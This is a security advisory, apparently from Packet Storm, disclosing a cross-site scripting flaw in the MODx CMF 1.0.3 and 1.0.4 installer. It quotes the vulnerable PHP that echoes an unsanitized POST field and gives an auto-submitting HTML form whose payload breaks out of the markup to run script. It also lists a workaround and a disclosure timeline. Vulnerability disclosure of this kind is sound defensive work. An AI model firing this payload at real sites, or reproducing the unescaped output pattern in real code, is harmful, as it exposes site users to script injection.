MODx CMF 1.0.3 / 1.0.4 Cross Site Scripting

2010-07-08T00:00:00
ID PACKETSTORM:91612
Type packetstorm
Reporter Andrei Rimsa Alvares
Modified 2010-07-08T00:00:00

Description

                                        
                                            `Title: MODx Installation File XSS Vulnerability  
Vendor: MODx  
Product: MODx CMF  
Tested Versions: 1.0.3, 1.0.4  
Threat Class: XSS  
Severity: Medium  
Remote: yes  
Local: no  
Discovered By: Andrei Rimsa Alvares  
  
===== Description =====  
  
MODx CMF is prone to a XSS vulnerability caused by unsanitized user input data. The bug occurs in a file used in the installation process. A description of the affected file is shown below:  
  
--- install/connection.collation.php ----  
01: <?php  
...  
06: $database_collation = $_POST['database_collation'];  
...  
08: $output = '<select id="database_collation" name="database_collation">  
09: <option value="'.$database_collation.'" selected >'.$database_collation.'</option></select>';  
...  
23: echo $output;  
24: ?>  
--- install/connection.collation.php ----  
  
The variable $database_collation (line 6) receives user data via http post request and gets propagated to variable $output (line 9) without proper sanitization. Later the $output variable is outputted to the page in every program path causing the bug (line 23).  
  
===== Impact =====  
  
Malicious java script code can be executed in the context of the affected web site.  
  
===== Proof of Concept =====  
  
<form action="http://target/install/connection.collation.php" name="evil" method="post">  
<input type="hidden" name="database_collation" value="</option></select><script>window.alert(String.fromCharCode(88,83,83));</script>" />  
</form>  
<script>  
document.evil.submit();  
</script>  
  
===== Workaround =====  
  
Remove all installation files after MODx is successfully installed.  
  
===== Disclosure Timeline =====  
  
June, 16 2010 - Vendor notification.  
July, 07 2010 - No vendor reply. Public disclosure.  
  
===== References =====  
  
http://modxcms.com  
`